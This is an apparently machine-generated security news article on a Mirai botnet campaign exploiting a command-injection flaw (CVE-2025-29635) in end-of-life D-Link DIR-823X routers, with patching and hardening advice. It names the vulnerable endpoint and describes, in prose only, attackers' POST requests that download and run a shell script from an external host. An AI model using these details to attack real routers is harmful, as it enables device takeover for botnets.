Ethical Hacking News
A new Mirai campaign has been discovered that actively exploits a critical vulnerability in outdated D-Link DIR-823X routers, allowing attackers to execute arbitrary commands on remote devices. This exploit highlights the ongoing threat posed by IoT devices and emphasizes the importance of keeping software up-to-date with the latest security patches.
A new Mirai-based malware campaign exploits a high-severity command-injection vulnerability (CVE-2025-29635) in outdated D-Link DIR-823X routers. The exploit allows authorized attackers to execute arbitrary commands on remote devices via POST requests to the /goform/set_prohibiting endpoint. Attackers are sending POST requests that change directories, download a shell script (dlink.sh) from an external IP, and execute it. This campaign is notable for being the first time in-the-wild active exploitation of CVE-2025-29635 has been observed. Users of affected routers should upgrade to newer models with frequent security fixes, disable remote administration portals, change default admin passwords, and monitor for unexpected configuration changes.
A new Mirai-based malware campaign has been identified that actively exploits a high-severity command-injection vulnerability (CVE-2025-29635) affecting outdated D-Link DIR-823X routers, enlisting devices into the botnet. This exploit takes advantage of an authorized attacker sending a POST request to a vulnerable endpoint on these routers, triggering remote command execution (RCE).
According to Akamai's SIRT (Security Intelligence Team), this vulnerability exists in D-Link DIR-823X series routers with firmware versions 240126 and 24082. This allows an authorized attacker to execute arbitrary commands on remote devices by sending a POST request to the /goform/set_prohibiting endpoint via the corresponding function, which can trigger RCE.
The researchers who discovered this vulnerability briefly published a proof-of-concept (PoC) exploit on GitHub but later retracted it. Akamai's observations show that attackers are sending POST requests that change directories across writable paths, download a shell script (dlink.sh) from an external IP, and execute it.
Interestingly, this campaign is notable for being the first time in-the-wild active exploitation of CVE-2025-29635 has been observed. The vulnerability was first disclosed by security researchers Wang Jinshuai and Zhao Jiangting 13 months ago but remains unpatched on many devices.
The implications of this exploit are significant, as it highlights the ongoing threat posed by outdated hardware and the importance of keeping software up-to-date with the latest security patches. In particular, users of routers that have reached end-of-life (EoL) should be cautious and take steps to protect their devices from potential attacks.
BleepingComputer has contacted D-Link regarding the reported activity and will update this post as soon as they receive a response. Meanwhile, users of affected routers are recommended to upgrade to newer models with active support for frequent security fixes, disable remote administration portals if not needed, change default admin passwords, and monitor for unexpected configuration changes.
The increasing use of Mirai-based malware highlights the ongoing threat posed by IoT devices and their potential to be used in DDoS attacks. As such, it is essential for users to remain vigilant and take steps to protect themselves from these types of threats.
Related Information:
https://www.ethicalhackingnews.com/articles/New-Mirai-Campaign-Exploits-CVE-2025-29635-Vulnerability-in-EoL-D-Link-Routers-ehn.shtml
https://www.bleepingcomputer.com/news/security/new-mirai-campaign-exploits-rce-flaw-in-eol-d-link-routers/
https://www.akamai.com/blog/security-research/2026/apr/cve-2025-29635-mirai-campaign-targets-d-link-devices
https://www.helpnetsecurity.com/2026/04/22/new-mirai-variants-target-routers-and-dvrs-via-old-flaws/
https://nvd.nist.gov/vuln/detail/CVE-2025-29635
https://www.cvedetails.com/cve/CVE-2025-29635/
Published: Wed Apr 22 15:53:31 2026 by llama3.2 3B Q4_K_M
